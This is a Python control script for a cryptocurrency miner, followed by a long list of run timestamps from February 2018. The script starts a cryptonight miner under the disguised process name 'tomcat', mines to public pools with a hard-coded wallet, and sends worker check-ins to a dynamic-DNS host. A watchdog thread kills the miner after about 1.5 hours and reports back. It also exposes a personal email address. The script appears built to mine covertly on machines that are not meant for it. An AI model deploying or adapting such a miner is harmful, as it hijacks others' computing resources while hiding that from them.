import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:06.418936
#2018-02-17 16:10:01.560792
#2018-02-17 17:59:05.741795
#2018-02-17 19:48:04.662328
#2018-02-17 21:37:05.539774
#2018-02-17 23:21:05.159815
#2018-02-18 01:08:07.737200
#2018-02-18 02:56:04.526357
#2018-02-18 04:44:06.273034
#2018-02-18 06:36:07.612415
#2018-02-18 08:26:06.405579
#2018-02-18 10:13:07.373448
#2018-02-18 11:59:02.158408
#2018-02-18 13:43:07.189248
#2018-02-18 15:34:07.007702
#2018-02-18 17:22:05.678505
#2018-02-18 19:11:04.124111
#2018-02-18 20:57:07.139391
#2018-02-18 22:44:04.974807
#2018-02-19 00:33:06.754820
#2018-02-19 02:18:05.675609
#2018-02-19 04:05:08.269728
#2018-02-19 05:49:06.778335
#2018-02-19 07:38:04.838326
#2018-02-19 09:27:08.458921
#2018-02-19 11:16:08.270983
#2018-02-19 13:03:07.587313
#2018-02-19 14:49:02.165778
#2018-02-19 16:37:04.464079
#2018-02-19 18:24:05.482307
#2018-02-19 20:10:10.336377
#2018-02-19 22:00:01.834611
#2018-02-19 23:46:05.654484
#2018-02-20 01:33:06.434938
#2018-02-20 03:21:06.663681
#2018-02-20 05:08:01.682860
#2018-02-20 06:50:05.561253
#2018-02-20 08:37:03.771339
#2018-02-20 10:21:05.038078
#2018-02-20 12:06:04.189859
#2018-02-20 13:54:10.535188
#2018-02-20 15:39:02.151601
#2018-02-20 17:23:01.713406
#2018-02-20 19:13:07.581372
#2018-02-20 21:02:08.399226
#2018-02-20 22:48:08.267652
#2018-02-21 00:34:04.362397
#2018-02-21 02:19:07.461553
#2018-02-21 04:06:04.835498
#2018-02-21 05:53:06.138614
#2018-02-21 07:41:05.476372
#2018-02-21 09:26:04.752485
#2018-02-21 11:14:06.471422
#2018-02-21 13:01:05.062255
#2018-02-21 14:48:07.736089
#2018-02-21 16:35:05.989599
#2018-02-21 18:24:02.107500
#2018-02-21 20:08:05.981799
#2018-02-21 21:55:10.267022
#2018-02-21 23:40:07.817081
#2018-02-22 01:30:08.921242
#2018-02-22 03:18:03.711327
#2018-02-22 05:05:06.517672
#2018-02-22 06:48:05.883290
#2018-02-22 08:36:01.254262
#2018-02-22 10:23:01.854873
#2018-02-22 12:08:02.050461
#2018-02-22 13:53:01.685049
#2018-02-22 15:40:08.170229
#2018-02-22 17:26:07.513850
#2018-02-22 19:14:04.003424
#2018-02-22 21:06:08.395020
#2018-02-22 22:52:05.307853
#2018-02-23 00:39:05.305996
#2018-02-23 02:27:06.027571
#2018-02-23 04:17:03.581874
#2018-02-23 06:02:08.308230
#2018-02-23 07:49:01.816830
#2018-02-23 09:49:05.604157
#2018-02-23 11:54:01.560264
#2018-02-23 13:42:10.050120
#2018-02-23 15:31:01.699873
#2018-02-23 17:19:10.168012
#2018-02-23 19:05:09.331975
#2018-02-23 20:52:05.452491
#2018-02-23 22:41:01.180866
#2018-02-24 00:27:04.455374
#2018-02-24 02:18:01.429897
#2018-02-24 04:08:01.690985
#2018-02-24 05:56:08.158068
#2018-02-24 07:44:09.038202
#2018-02-24 09:29:06.111270
#2018-02-24 11:24:07.210738
#2018-02-24 13:13:06.950780
#2018-02-24 15:03:01.603916
#2018-02-24 16:53:05.956712
#2018-02-24 18:41:05.867177
#2018-02-24 20:32:05.372924
#2018-02-25 01:14:06.644895
#2018-02-25 05:06:07.544269
#2018-02-25 10:15:03.750594